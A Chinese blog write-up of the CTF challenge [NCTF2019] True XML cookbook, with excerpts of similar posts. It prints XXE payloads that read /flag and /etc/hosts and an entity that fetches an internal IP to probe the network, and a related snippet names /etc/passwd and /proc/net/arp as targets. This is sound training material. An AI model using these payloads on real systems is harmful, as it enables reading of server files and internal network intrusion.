[NCTF2019]True XML cookbook

最新推荐文章于 2023-12-09 13:08:54 发布
最新推荐文章于 2023-12-09 13:08:54 发布
阅读量440 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 CTF WEB安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/satasun/article/details/109706693
本文介绍了在[NCTF2019]TrueXMLcookbook挑战中,如何利用XML External Entity (XXE)漏洞进行内网探测和密码爆破的尝试。作者首先尝试直接爆破密码,然后利用XXE漏洞读取本地文件以探测内网存活主机,最后通过修改实体地址尝试攻击内网IP。虽然未能直接获取密码,但展示了XXE漏洞的攻击手段和思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[NCTF2019]True XML cookbook

爆破

抓包爆破,想直接爆出密码。
然鹅我天真了。

XXE漏洞

这里存在XXE漏洞,利用脚本直接打:
构造:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
  <username>&admin;</username>
  <password>password</password>
</user>

在这里插入图片描述

没有哦·····

打内网

XXE漏洞可以直接攻击内网用户,先查看内网存活主机:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "file:///etc/hosts">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述
看到了本机ip,但是不知道存活ip。
可以用BP爆破(但是看到wp上是说ip最后一位为11):

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM  "http://10.34.239.11">
]>
<user>
  <username>&file;</username>
  <password>password</password>
</user>

在这里插入图片描述

BUU [NCTF2019]True XML cookbook
qq_62078839的博客
04-19 2098
打开连接 熟悉的界面,我们就不做黑盒测试了,直接抓包修改xml payload:<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>123456</passwo...
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 466
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
buuctf [NCTF2019]True XML cookbook
最新发布
01-20
### 关于BUUCTF NCTF2019 True XML cookbook 的解析 #### XXE漏洞利用基础 XML外部实体注入(XXE)是一种攻击方式,允许攻击者通过恶意构建的XML数据来访问服务器上的文件或其他资源。在NCTF2019中的`True XML ...
XXE漏洞与CTF题目
m0_62725813的博客
12-09 812
典型的XXE攻击是由XML声明:<?DTD部分(通过特殊的命令去其他文件读取信息)SYSTEMXML部分组成危害:XXE 可以通过dtd去读取,访问其他文件或者网站,类似于ssrf">]> DTD部分</scan> XML部分scan标签设置一个test的实体,这个实体是通过system命令访问1.txt构造payload>//XML声明">]>
[NCTF2019]True XML cookbook 1
snowlyzz的博客
05-05 709
又是一道关于XML注入的题 xml语法: <?xml version="1.0" encoding="UTF-8"?> //xml声明 ​ <!DOCTYPE copyright [ //DTD(文档类型定义) ​ <!ELEMENT note (to,reset,login)> //定义元素 ​ <!ENTITY test SYSTEM "url"> //定义外部实体test ​ ]> 直接抓包! <...
2020/7/07 - [NCTF2019]True XML cookbook - xxe
抒情诗
07-08 739
我准备发两份,一份发到这里,另一份发到优快云上面,这里的内容浏览器不好搜到,别人看不到,无趣 第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8看看这熟悉的内容,好吧,第一道payload为 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "./flag.txt"> ]> <user><
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值